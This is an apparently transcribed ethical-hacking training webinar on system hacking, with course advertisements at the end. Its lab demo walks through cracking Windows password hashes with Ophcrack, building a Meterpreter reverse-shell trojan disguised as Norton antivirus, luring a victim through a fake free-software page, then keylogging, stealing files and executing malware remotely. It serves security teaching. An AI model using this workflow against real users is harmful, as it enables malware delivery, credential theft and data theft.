Hello everyone, good morning. Thank you once again for joining us. We apologize for the delay. We'll be starting now. My name is Chisamani Silva. Our topic for today is system hacking, which is a core under certified. Today is Mr. Kazim Adegboyega. If you're so I can see our participants are having audio issues. Let me see what I can do, please. We apologize for the delay once again, and we apologize for the audio issues you're having. Okay, so Mr. Kazim is trying to prevent.
Hi, good afternoon, or is it still morning? Good morning, everyone. My name is Kazim Adegboyega. I'm an IT professional and I'm a technical trainer. And I'm really excited to be presenting today's topic to you guys on systems hacking. So without any further ado, let's get to it. These are the objectives that we're going to be covering here that I'm going to be walking you through. We take a look at system hacking techniques. We'll look at password guessing, privilege escalation, password cracking, and we'll delve into the demo where I'm going to be showing you how password can be cracked using tools such as LoftCrack, using OptCrack, and I'll also be walking you through how we can exploit the vulnerability of a Windows 7, Windows 8, or even Windows 10 systems using Metasploit. And if time permits, we'll look at some of the countermeasures that we can take to prevent some of these things from happening, to prevent us from being victim to some of these attacks. So system hacking, what really is system hacking? System hacking refers to hacking into a computer system by breaking the password protection of that computer system in order to take control of the system, or to steal data from that system, or sometimes the intent of the intruder, the intent of the hacker might be to crash the system. Sometimes when they try to gain access to a system and they find out that there are no juicy information on the system, so they might just decide to crash the system altogether, right? So the main intent, again, the main objective, the main goal of system hacking is to gain access to a system, sometimes to escalate privileges as well. If the intruder happens to get hold of a user with a very restrictive set of permissions, and also sometimes to execute application on those systems and to add files. So those are some of the objectives of system hacking. Now, before the system hacking phase, there are some pre-test phases that one will need to complete before delving into system hacking. Before system hacking, the hacker or the cracker would have done what is known as reconnaissance, right? So that's trying to study the target, trying to learn enough information about the target. For instance, before an attacker can launch an attack against the system, we need to know, the intruder will need to know the vulnerabilities that those system has, what operating system are those systems running, running what is known as operating system fingerprinting, to know the operating system that those hosts are running. The intruder will also want to know which of the hosts are alive and which one of the hosts are not, right? That is being achieved via the scanning phase, right? So after all of these things is done, then one can, after scanning, which hosts are alive, which one of the hosts are dead. Then one can look at cracking passwords, right? So the goal is to completely own the target machine, right? And for one to do this, for an intruder, for an attacker to do this, the attacker requires some active usernames on the person's system, on the targeted system, and also passwords associated with those username. And this is also not sufficient. You also need to have the attacker will need to have rights on the system to be able to do certain things on the system, to be able to perform certain tasks on the system. Tasks such as downloading files from the system, uploading rootkits to the system, so on and so forth. Now, this is achieved by exploiting some of the common vulnerabilities associated with the operating system. That's the targeted operating system. If the operating system is running Windows, if it's running Linux, so each of those operating systems have their own list of vulnerabilities that can be exploited, by the way. So to successfully hack a system, an intruder will need to identify various password cracking techniques and tools. So there are a number of password cracking techniques that one can leverage on. Although when we talk about the methods, there are two common methods of password cracking. One is online password cracking, where one can leverage on tools such as Cain and Abel, to perform a man in the middle. And there's also offline password cracking, right? So those are the two common password cracking methods, and there are a number of tools that people can leverage on to do this. We have tools such as LoftCrack, there's OptCrack, there's Cain and Abel, there's John the Ripper, and so on and so forth. So the tools are numerous, right? Or better still, if the hacker, if the intruder is pretty good with a particular distribution of Linux operating system, known as Kali Linux. Kali Linux comes bundled with a number of these tools, so one can launch quite a number of attacks if you're pretty good with this Linux distribution. So I'm also going to be showing you, walking you through a demo using a Kali Linux operating system. So just hold on for that. I'll show you that in a little bit. So the hacker also need to understand escalation of privilege, how privilege can be escalated, right? So sometimes when an attacker tries to crack a password, they might end up with a username that is very restrictive. The username, that user account really can't do much on the system. So what they need to do then is to escalate the privilege of that user account. That can be done by assigning the user into groups with into very powerful groups, to make the user start to do the things that administrators will ordinarily do. So those users can start doing it. So that is what privilege escalation is about. Then the intruder also needs to understand the role of keyloggers and rootkits, right? So keyloggers are one way by which hackers steal information from target systems, from targeted systems. So if by the way, there are software keyloggers and there are hardware keyloggers. So if you have a software keylogger installed on your system, then one simply can configure the keylogger to send an email of all of your keystrokes. So anytime you visit your banking website, you type your PIN numbers, with your keyboard, those things are being, logged, and they can be emailed to the attacker, right? So rootkits are a set of programs that the attacker can put together to do different things, right? So we'll look at how to create one in the demo. So I'll be creating a backdoor that would distribute to a target system, that will wait for the system to open it, and we can exploit the vulnerabilities on the system, right? So the hacker will also need to understand how to hide files, how to cover one's track, so which is one of the things that hackers knows how to do best. So they don't want to leave any footprints of their activities on the system. So they want to make sure that they clear their tracks, and one way to do this is by clearing the events log of the system, of the targeted system. So an attacker also needs to know about steganography, right? Steganography is a method of hiding sensitive information behind an image. So it's possible for me to have an image that contains very sensitive or secretive information. So whereas to an ordinary user, the user is seeing just an image file, not knowing that the image file contains a payload behind it, contains some additional information, right? So let's continue with password guessing. You see, password guessing is the simplest way of cracking a password, right? So it's one of the first steps that an attacker will take when it comes to cracking a password. So this does not require the use of any tool. It doesn't require the use of any sophisticated tool. So what the attacker tries to do is to try to guess the password of the individual by analyzing the user's information. Information such as what is the birthday of the user, what is the spouse name of the user, so on and so forth. And also, most of the time, people fail to change the default password that comes with the devices that they acquire. Those their network devices. For instance, somebody newly acquires a router, it might be a Cisco router, a Juniper router. Those devices are a wireless device. Those devices usually will come with a default password. So if you don't change those passwords, people know those default passwords. There are sites that you can visit on the internet that will give you a list of all devices with their associated default passwords, right? You have sites such as defaultpassword.com. There is default-password.info. So when you visit those sites, you get to see listings of manufacturers, their equipment, and their associated default passwords. Sometimes too, the systems that we use at work or our personal system, we have user accounts created for us, or we create user accounts for ourselves, and we end up by choosing very weak passwords, passwords that can easily be guessed, passwords that are commonly used, passwords just such as password. Imagine a user using password as his password, or this very common password here, uppercase P with the @ sign, with the $$ symbol, W0RD is also a very common one to use. So when all these kind of passwords are used, people simply don't even, hacker and intruder don't need to use any sophisticated tool. It's going to first of all start his hacking attempt by guessing the user's password. If that doesn't work, then they can move into using other sophisticated methods, right? Such as password sniffing. So password sniffing is a tactic where an intruder will run a packet sniffer, on a network, to listen to communication that is coming into the network and leaving the network as well. A common password sniffing tool, or a common tool that people use here is Wireshark. So if you have somebody running Wireshark on your system, and let's look at a scenario where an administrator, a Cisco administrator, needs to configure his router, and the Cisco administrator telnet into his router to have his router configured. When you telnet into a router, telnet as a protocol is known to be a protocol that is very vulnerable, is not secure, right? So there's no security built into telnet. So when you telnet into a network device, then your credentials, your username and password travel over the wire in plain text. So those passwords of yours, those credentials can easily be seen using a packet sniffer such as Wireshark, right? Privilege escalation. Most of the time is difficult to get hold of an administrator user account. I mean, even intruder, a hacker can easily get hold of an administrator account. That makes his job a lot easier, right? So he has to do less work because with that account, he can do just about anything, on that system. He has complete, total control of the system. But the case is not does not always hold true because administrators are smart individuals. They know not to use weak passwords, so they change their password often. They use very complex passwords, right? So if that is the case, if it becomes very difficult for an hacker, for an intruder to get hold of an administrative account that he needs to perform his job, then they simply can settle for a lesser account, an account without no much privilege, a regular user account. And what they end up doing is escalating the privilege of that user account. This can be done, for instance, by adding the user to administrative groups, so that the user now has the same set of power, the same set of privilege as an administrator user, on the machine. One way of mitigating, against this vulnerability is ensuring that your operating system is well patched, right? So form the habit of patching, the antivirus that you have on your operating system, and also the operating system proper. And don't get into the habit of downloading free softwares all of the time. Downloading, you want Windows 10, you want Windows 8, and you have to get the cracked version of Windows 8 or Windows 10. Getting cracked softwares comes with a number of vulnerabilities because you don't know the source of the software. So when you happen to get free softwares, then you are also getting some additional information bundled with those free software most of the time. So password cracking. Password cracking is also another method that crackers use, that hackers use. So this is a process of recovering passwords stored on a computer system by leveraging on tools such as Cain and Abel, Loftcrack, John the Ripper, to crack the password. So usually people can use, when they use this tool, they can launch a dictionary attack, against, maybe the password hash, or maybe against a database where you have passwords stored. So launching dictionary attack simply will scan through the system for passwords, because those softwares will come bundled with different set of dictionaries. So if your password or the password associated with any of the user accounts can be found in a dictionary, then that can be cracked in no time, right? Very easily, can easily be cracked, right? But if the user are a bit technical savvy, and they form the habit of using very strong passwords, using uppercase letters, lowercase letters, special characters, then it becomes difficult for those tools to crack, right? So dictionary attack can no longer work. So they can now settle for using brute force attack. So brute force attack make those tools that they use combine numbers plus letters plus special characters, uppercase, lowercase letters, right, till the password can be cracked, right? And you also have a combination of all of this in hybrid attack. Good and good. So it is demo time now. So it is time for me to show you how system hacking is done. So I hope you're ready for this. So to show you this, I'm going to be using two systems. I have a Linux system here, my Kali Linux box. So let me log into the Kali Linux box. My username is root, and I'll type in my password here. Good. And I will also do a remote connection to a client OS, a Windows 7 OS. Connect, and let me type in my password here. I can remember the password. Yes. Okay, and I also have a Windows 10 machine here as well. But let's start with the Windows 7. If time permits, then we can look at the Windows 10 apps. So this is my Windows 7 machine. I'm going to start with Loftcrack. Okay, so I have Loftcrack installed on this machine, and I'm using the evaluation edition of Loftcrack for now. So I will click on OK. Oh, my key for Loftcrack has expired. Ooh. Alright, not to worry. So let's continue with the demo. So I will click on OK here again. Here we have Optcrack. So to use Optcrack, this is what Optcrack look like. First, you need to download tables, right? This table contains passwords, right? And different OSs, have different tables that you can buy by visiting Off-Crack website. So I have one that I've downloaded here. There's this Vista tables that I've downloaded on my desktop, so I can click install, and so I'll browse to my desktop to select this folder. Good. So it's been installed, so I can click on OK. Alright. So what I can look at doing is launching, the SAM file. We have the SAM file inside the system32. That's the location of your user accounts, where user accounts are created on a local system. So let me load. Alright, so this is taking some time. So we'll try to wait for it. Alright, so this is taking a lot of time now, so we'll try to redo this again. So I'll just attempt to close this. So again, you need to load your password tables, and the password tables can be downloaded by visiting their website here. So I have it downloaded to my desktop, so which I've done. So I've installed the password tables on my system. So we'll load the password dump earlier on. So I used this pw dump 6. We can as well use this one. So let's try this one. Wow, so this one works now. So as you can see here, so let's attempt to crack the passwords. So right now is cracking the passwords, right? And I said the hash, this NTLM hash, is getting them from this local system. The NTLM hash, you can find them inside system32. So if I come to C drive, Windows, and I come to system32, config, so the password is stored here inside the SAM file. So that's where this password is stored. So it's downloading the hash from that location, and as you can see so far, it's been able to crack some of the passwords. John Moore's password is John. The password for Malik Abbas is Malik. And John Doe does not have a password, so empty. The guest account is disabled with no password. We are yet to get the password for the administrator account. So the administrator account is a little strong. I used a bit of a stronger password, so these two might not be able to crack that, but let's wait and see the results. So rather I think we should move on, but you get the picture here. So all we need to do is wait, right? So at the moment is on 89%, so maybe we can check back on it, but at least you can see here that we've been able to crack open some passwords. So you don't want to ever use a dictionary based password or use a very simple password. Those passwords can easily be cracked, as you've just seen here. So next, let's proceed to cracking password using our Linux machine. So I'm going to minimize this one, and again I will log into my Linux box. Okay, so I'm going to open my terminal window. Okay, so the first thing I need to do here is to create a payload file. I want to create a backdoor, something that looks like a Trojan that I will attempt to distribute to my clients. I know oftentimes people like to they want free software. So let's assume we have a particular antivirus that I know people would want to download for free, but not knowing that those antivirus is going to give intruders complete access to their system, by downloading them or by installing them on the box. So what I want to do first is create this file, this antivirus file. So to create the file, I can use MSF Venom to do that. MSF Venom /p is for a Windows machine. We're doing this for Windows, not Linux. /Metapreter /reverse TCP. Okay, invalid payload, so I'll do that again. Let me just continue, and then listening host. What is going to be my listening host? My listening host is going to be this same machine. Quickly, I need to get the IP address of this machine. To get the IP address on a Linux box, you use ifconfig. Okay, 8200. This is not the IP address that I want to use, so I need to quickly change the IP address. It's not on the same network with the other host. So to change the IP address, we can use ifconfig. The interface name is at 0.192.168.10. But we use okay, 200 is fine. And the net mask, the subnet mask is 255.255.255.0. And let's add a gateway. Routes add default gateway is 192.168.10.1 for the at0 interface. And to give it a DNS address, we will edit the resolve.conf file, which is inside etc directory, resolve.conf, using the VI editor. So as you can see here, insert, and let's change that to 10.1. Good. Right, Q and save. Yes. So let's confirm if I can ping at the gateway, ping 192.168.10.1. Yes, I can ping the gateway now, so I guess we're good. Alright, so I know what my IP address is now. My IP address is that the listening host is this my Kali Linux machine. So I'll type in the IP address 192.168.10.200, and I need a listening port to L ports. The listening port can be any number, so I'm using this number here. I forgot, I need to equals to, use the equal to sign. So what's the platform? Platform is Windows. The architecture is x86. You can choose x64 if you know that the system that you're going to be executing this payload file on is a 64-bit machine. But why I'm choosing to use x86 here, that's 32-bit platform, is because 32-bit softwares can be executed on both 64-bit and 32-bit system. So it's better to play safe and work with 32-bit applications. So I will file type will be an executable file, exe, and the output is going to be, what do I want to name it now? Let's call it Norton 360.exe. Invalid payload selected. What could be wrong? Let's troubleshoot. Okay, so I think I can see something here. Windows. Fine, so the payload file now has been created. It's going to put it inside our home directory, so we can get to the home directory by clicking here. So this is the file here. So the next thing I want to do is to find a way of distributing this file, to people that need the free software, people that are going to fall victim, to this my free software. So I'll set that up on the Apache server that I have on this my same Linux machine. So if you have Apache installed, which it is, on this Kali box, Kali Linux machine, so you usually have it inside var directory, www directory, html, right? So we have this our index.html file, so I can edit this file now with a text editor select, and let me try to put in some text here. Welcome to Kazim free software sites. Okay, so let me do a break, perhaps a paragraph, and I can say get pre-cracked /pre activated apps here on this website. Again, line break, download Norton 360 2018 antivirus for free. Click here to download. Okay, click here. The href equals to close my tag, and the name of the file, the malicious file, Norton 360.exe. So I need to put the that file, I need to also host it on the web server here. So I will copy the Norton 360 and put it on the web server here. Good. So I can also do the same if I wish for, maybe this is McAfee, or maybe download Windows download latest patch Windows 10 patch. Click here. Okay, so this is sufficient. Let me save this. Right, so I just need to email this to people, but before then I need to make sure that this my Kali Linux is listening, right, for incoming traffic. So to do that, I will need to start a number of services. So let's start the Apache service first. Service Apache start. Okay, so that is running now. So service PostgreSQL start. Okay, so that is also running. So let me launch my Metasploit, MSF console. Right, so I'm going to start with use exploit multi okay, so set payload is a Windows payload, Windows Metapreter reverse underscore TCP reverse Metapreter Windows Good. So I need to also set my listening host set hell host to the IP address of my host, which is this Linux box IP .200 in this case. I need to set as well the L ports, which I created earlier, to be 8001, and exploit J, so that it will start listening. Right, so let's connect again to the client machine. The Windows 7 machine, so I can launch the web browser. Okay, this tool is still running and is okay. Good. So first we need to be sure that we can connect to the system CMD, so I can ping I'm on the same network as my Kali Linux box, ping 192.168.10.200. Yes, we can. Okay, so I'm going to try to access my web server by typing the same IP address, 192.168.10.200. Enter. Good. So as you can see, now we have access to the website. So if I want free Norton 360 2018 antivirus, I should click here. So I'll click here to download. Yes, and Norton 360 right now is being downloaded to my system. So let's open the folder and attempt to install Norton 360. Run. Right now Norton 360 has been executed on this system. So the user might just be wondering that what's happening. I'm installing Norton 360 but nothing is getting installed on my system. It is because of time. If not, we can actually package a real antivirus that we install from start to finish and then inject something into the antivirus. But this is all we need the user to do. So let's come back to the Linux box. So as you can see here, there is a session that has been established. One session is now being opened, right? So we'll look at exploiting the sessions now. So I have one session. It's possible for you to take multiple sessions. So to exploit the session, I'm going to type sessions -I and 1. The first session. Okay, so I can first of all get the system info, sysinfo. Right, so as you can see here, I have the name of the machine, I have the operating system build, I have the operating system architecture is a 64-bit system, is a member of a work group, only one user is logged into it. What else can I do? How about taking a screenshot of the system? Right, so to do that, you type screenshot. Okay, so it's giving us access denied because I'm logged onto the box as a restricted user, but not to worry. Let's see some other things that we can do, such as how about keystrokes? We want to view keystrokes on the machine. So to view keystrokes on the machine, I'm going to type key scan start. Okay, so it's going to be listening for any keystroke that is being made on this system moving forward. So I'll try to open facebook.com. So as you can see, I'm on Facebook now, so I'm going to type in some fictitious, just some random username. Let's call the username test user, and let's make our password. How about we make it password of password uppercase P with the @ sign with the $W0RD. Oh, okay, so that's good. I'll just type this in, cut and paste it right in here. Good. So we don't even have to click enter. So let's see what we've done if we're able to capture those keystrokes. To capture keystroke, we've turned it on. So to see what the system has been able to capture, we type in a key scan dump. Right, so you can see the username is test user and the password is this. So anytime you type on that system right now, you can see the website that is being visited is facebook.com. So it's going to be keeping track of it. So let's do some more interesting things. Going to shell. Okay, so right now I'm on the remote system. So I'll try to create some files on this remote system. Let's open the C drive and then create some fictitious files. Say inside the C drive, how about we make a file and call this file salary.txt. Right, and we can also make another file, save. Let's call this contract.docx. Alright. Okay, so I have some fictitious file on the system. So let's see if we can get access to those files. So I'm going to first dir, so cd/. dir, so we can see those files exist. Salary.txt. I can see my contract.docx as well. Good. So let's exit from here. So I'm back to Metapreter. So I will cd/. Okay, ls. So right now I'm directly inside the C drive. How about if I need to copy the salary.txt to my system? To copy the salary.txt to your system, you do a download salary.txt, salary. Oh, I saved it twice with txt.txt. Okay, right, so I've downloaded it to my system. What other file do we need to download? We also have the contract.docx, so let's download that one as well. So download contract.docx. So I've also downloaded that to my system. So if you're wondering, where are the files downloaded to, so I can come to home and you can see salary.txt, you can see my contract.docx. So I can actually open the file from here remotely, on my system. What else can we do? How about pushing up a virus? So I have this payload, this Trojan that I've created on my system. So I need to transfer those virus to the remote system. So how do we do that? So to transfer something, to upload, you type in an upload and then the name of the file you intend to upload. I have it to be virus.exe. Right, so virus has been uploaded to the C drive of the system. Let's quickly confirm that. So you can see the virus is there. So I don't need to gain access to the system. I mean, I don't need to physically be on the system to execute the virus. So I can execute the virus from here as well. And to execute a file remotely using interpreter, so I can do execute F, the name of the file I intend to execute, virus.exe. So process created. So the file has been executed remotely. So if this file happens to be a Trojan that is going to wipe out the entire C drive of that individual, so that's how easy it is for me to do. So in the interest of time, I think we should leave it here today. So I hope this webinar has been informative for you. If you like to enroll for the CEH class at Ha-Shem, please do so by contacting Chisom. So I guess at the end of the webinar, Chisom will be sharing the contact details with us, how we can reach Ha-Shem, how we can reach her as well, if you need training on ethical hacking or any other course, by the way. And if you also need your kids to enroll for the upcoming boot camp for kids at the Ha-Shem Academy, you are also free to do so. So you can contact Chisom for all of those details, information that you need. So thank you very much, and I'll take your question now.
Okay, thank you, Mr. Kazim.
You're welcome.
Thank you very much. I don't know if we have any questions we'd like Mr. Kazim to answer before we try to end the session. Hello, do we have any questions? Okay, I guess there are no questions then. Just before we go, please, I would like to introduce my colleague. She wants to inform us of a program we have coming up at our affiliate, Ha-Shem Academy. You might have relatives that are interested, or someone that will be interested in this particular program. Also, like Mr. Kazim said, we have a certified ethical hacking course. So if you're interested, you can send an email to training@hashem.com. Let me type that. You can get the course for the training, and we'll follow up with you on your preference, basically. So now I'll be handing over to Juliet to tell us about the program we have coming up at Ha-Shem Academy. Thank you. And we'll have a poll after that.
Hello everyone. My name is Juliet Aliogo from Ha-Shem Academy, an affiliate of Ha-Shem Network Set Limited. I'm here to introduce you to our new course pack tagged Summer Technological Bootcamp, which comes up from 1st to 31st August 2018 with a 30% discount rate for early birds up until 8th June 2018. our course pack entails not only technological courses, but also constructive activities for your kids, preteens and teens. We have our courses varies. Our courses ranges from computer appreciations, Microsoft Word, Office training, web design, graphic designs, hardware repairs. For the kids, we have coding for kids and graphic designs. Then other side activities include reading competition, spelling bee, etiquette, drawing competition, and highly effective communication skills and debate. So why don't you just take this advantage, this opportunity to enroll your child for the summer technological boot camp? Hello? Where will be technologically enhanced with our courses during the summer. Thank you. Okay, yeah. For more inquiries, you can call this number 080. Okay, you call the number on your screen. 080 98444 815 or 070. Yes, we do. No, not in Port Harcourt. We only in Lagos here for now.
Okay, so if you'd like to find out more about our trainings, please visit www.hashemacademy.com. And if you are interested in this summer technology bootcamp, there is a button where you can just register, and we'll contact you immediately. So we have www.hashemacademy.com. Thank you. And thank you all for joining. I'll be switching to another phone now. Would really like to get your opinion before we go, and we have um, Scholar of the Month. So for the most participants, it's actually starting from our next webinar. For those that participate, the most ones that join early and have like highest form of participation during our webinars, we'll be giving them gifts at the end of the month. So we have our webinars once a month. That means for each month you get a gift if you are the best participant for that month, for that session. So thank you.